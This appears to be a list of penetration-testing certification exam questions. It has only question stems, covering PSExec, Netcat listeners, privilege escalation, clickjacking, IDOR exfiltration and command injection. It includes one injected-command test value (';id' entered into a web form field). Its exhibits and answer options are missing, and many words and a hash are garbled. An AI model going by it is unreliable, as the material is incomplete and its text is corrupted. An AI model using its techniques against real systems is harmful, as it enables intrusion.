A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?
After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
• Code review
• Updates to firewall setting
A penetration tester is performing an annual security assessment for a repeat client The tester finds indicators of previous compromise Which of the following would be the most logical steps to follow NEXT?
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used
in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
An attacker receives a DHCP address and notices the hostname was populated in the corporate DNS server. Which of the following BEST describes how the attacker can use this information?
A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of
default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the
following is the MOST likely post-exploitation step?
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A penetration tester needs to provide the code used to exploit a DNS server in the final report. In which of the
following parts of the report should the penetration tester place the code?
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in QUESTION NO: within the last 30 minutes. Which of the following has MOST likely occurred?
If a security consultant comes across a password hash that resembles the following
b117 525b3454 7Oc29ca3dBaeOb556ba8
Which of the following formats is the correct hash type?
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:
To which of the following should the tester give the HIGHEST priority?
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack Which of the following remediation steps should be recommended? (Select THREE)
A penetration tester successfully exploits a DM2 server that appears to be listening on an outbound port The penetration tester wishes to forward that traffic back to a device Which of the following are the BEST tools to use few this purpose? (Select TWO)
A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?
A vulnerability scan is run against a domain hosing a banking application that accepts connections over MTTPS and HTTP protocols Given the following results:
• SSU3 supported
• HSTS not enforced
• Application uses weak ciphers
• Vulnerable to clickjacking
Which of the following should be ranked with the HIGHEST risk?
A penetration tester is reviewing the following output from a wireless sniffer:
Which of the following can be extrapolated from the above information?
A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical
business function. Which of the following mitigations is BEST for the consultant to conduct?
A penetration tester attempts to perform a UDP port scan against a remote target using an Nmap tool installed onto a non-Kali Linux image. For some reason, the UDP scan falls to start. Which of the following would MOST likely help to resolve the issue?
A security consultant finds a folder in "C VProgram Files" that has writable permission from an unprivileged user account Which of the following can be used to gam higher privileges?
When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?
A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?
A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding. Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?
An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?
Given the following Python script:
Which of the following actions will it perform?
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)
While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that
imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria
must be met?
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?
Which of the following attacks is commonly combined with cross-site scripting for session hijacking?
A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443 The penetration tester observes the following output:
Which of the following has MOST likely occurred?
A penetration tester is performing a code review. Which of the following testing techniques is being performed?
A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.
The penetration tester observes the following response:
Based on the response, which of the following vulnerabilities exists?
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate
the application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The
application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely
preventing proxying of all traffic?
A software developer wants to test the code of an application for vulnerabilities. Which of the following
processes should the software developer perform?
When communicating the findings of a network vulnerability scan to a client's IT department which of the following metrics BEST prioritize the severity of the findings? (Select TWO)
During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:
Which of the following lines of code is causing the problem?